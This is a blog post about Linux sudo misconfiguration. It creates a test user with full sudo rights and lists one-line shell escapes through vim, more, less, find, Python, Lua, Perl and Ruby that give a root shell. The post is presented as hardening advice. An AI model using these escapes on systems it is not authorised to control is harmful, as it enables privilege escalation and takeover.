Sudon’t escape so easily!

H ow poor sudo configuration leads to simple full root access.

** I’ve added some ninja edits halfway down to clarify some things **

I was considering writing this as a part three to blue team fundamentals but I’ve decided it doesn’t quite fit the criteria. It falls more into the server hardening/gold build/secure lifecycles, which Leigh has written about in 5 parts starting here (and it’s well worth a read).

So let’s talk about ‘sudo’, if you don’t know what it is, simply put it allows a user with limited privileges to perform tasks with a high level of privilege. If you’ve not got there yet sudo is Super User DO, AKA do something as super user.

Relevant XKCD — https://xkcd.com/149/

For slightly more pertinent information:

When setting up an account you can assign individual sudo permission or have them inherited from a group. How to set these up is beyond the scope of this post. You can see what you’re allowed to run with sudo with the following command:

sudo -l

On a root user the output looks like this:

root@kali:~# sudo -l

Matching Defaults entries for root on kali:

env_reset, mail_badpass,

secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin



User root may run the following commands on kali:

(ALL : ALL) ALL

So we can see as root we can run any commands, which is entirely expected.

Now how about with a new user, lets create and test.

root@kali:~# useradd basic -s /bin/bash -m

root@kali:/home/basic# passwd basic

Enter new UNIX password:

Retype new UNIX password:

passwd: password updated successfully

root@kali:~# su basic

basic@kali:/root$ whoami

basic

basic@kali:/root$ cd ~

basic@kali:~$ pwd

/home/basic

basic@kali:~$ sudo -l We trust you have received the usual lecture from the local System

Administrator. It usually boils down to these three things:



#1) Respect the privacy of others.

#2) Think before you type.

#3) With great power comes great responsibility.



[sudo] password for basic:

Sorry, user basic may not run sudo on kali.

Okay so no permissions, dropping back into a root shell and running the command ‘visudo’, I duplicate the root privs for basic. Don’t do this in production, it is the equivalent of granting root (well not really, but that’s not part of this post).

The power!

****************************************************************

EDIT TEXT: I’ve been made aware there is some confusion from some quarters that:

Although it’s possibly/probably meant as sarcasm, it does infer a fair point about clarity of what is going on here. I have added ALL in lieu of adding each of the individual programs. It was a blunt instrument to prove a point, because I was too lazy to do a proper job of the sudoers set-up. If your sudoers file allows access to ANY of the below programs, then full root access is easily achieved. You’ve only allowed the less function? That’s a root shell. Only allowed Python? That’s a root shell. Hope this clears things up.

****************************************************************

It’s probably worth noting I could of added the user to the sudoers group when I created it, which would have had the same effect. In a production environment you would then lock down what could be run as sudo from the sudoers group. Anyway, repeating the ‘sudo -l’ command we see basic can run everything.

root@kali:/home/basic# su basic

basic@kali:~$ sudo -l

[sudo] password for basic:

Matching Defaults entries for basic on kali:

env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin



User basic may run the following commands on kali:

(ALL : ALL) ALL

Now for the escapes (With video demonstrations no less!)

VIM

!/bin/bash or :shell

MORE

Load a file long enough to be more than a page (or scroll window size down to a few lines

!bash

LESS

v :shell

FIND

find . -exec bash -i \;

Python

>>import os >> os.system(‘/bin/bash’)

LUA

> os.execute("/bin/bash")

Perl

exec “/bin/bash”;

then ctrl D for EoF.

Ruby

exec “/bin/bash”

So there you go, 8 ridiculously easy ways to drop into a root shell if you’ve managed to compromise an account with sudo privs on any of these programs. Alternatively 8 ridiculously easy things to remove from your sudoers access to stop them getting root without even having to think about it.